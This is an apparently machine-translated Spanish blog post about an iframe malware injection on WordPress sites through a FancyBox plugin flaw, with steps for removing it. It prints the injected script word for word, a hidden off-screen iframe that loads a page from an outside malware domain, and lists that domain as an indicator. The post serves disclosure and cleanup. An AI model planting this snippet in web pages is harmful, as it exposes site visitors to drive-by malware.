A principios de esta semana una serie de sitios web y blogs WordPress, recibió advertencias de infectados con malware a través de Google Webmasters.
El problema al que Google Webmasters a que se refiere es la presencia de un código / guión iframe malware los sitios web de origen.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Parece que es una vulnerabilidad a pluginacervo FancyBox para WordPress que hasta ayer (05.02.2015) no había sido actualizado desde hace mucho tiempo.
La solución de este problema y desinfección de sitios virus con este malware, es relativamente simple.
1. Desactive el complemento FancyBox.
2. Eliminar todos los archivos del complemento FancyBox del servidor (a través de FTP)
3. Instale la nueva versión del complemento (FancyBox 3.0.4)
FancyBox para WordPress 3.0.4
- Se cambió el nombre de la configuración afectada por el problema de seguridad mencionado en 3.0.3. Esto debería evitar que el código malicioso aparezca en los sitios donde se encuentra el complemento. updated sin eliminar el código malicioso.
FancyBox para WordPress 3.0.3
– Se ha corregido un problema de seguridad.
Información de Malware:
TIPO: Iframe redirección
TARGET: WordPress Caja lujosa
DOMINIO MALWARE: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
Malware RAW CÓDIGOS:
MALWARE ESCRITO: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Elimina el malware de tu WordPress página web.
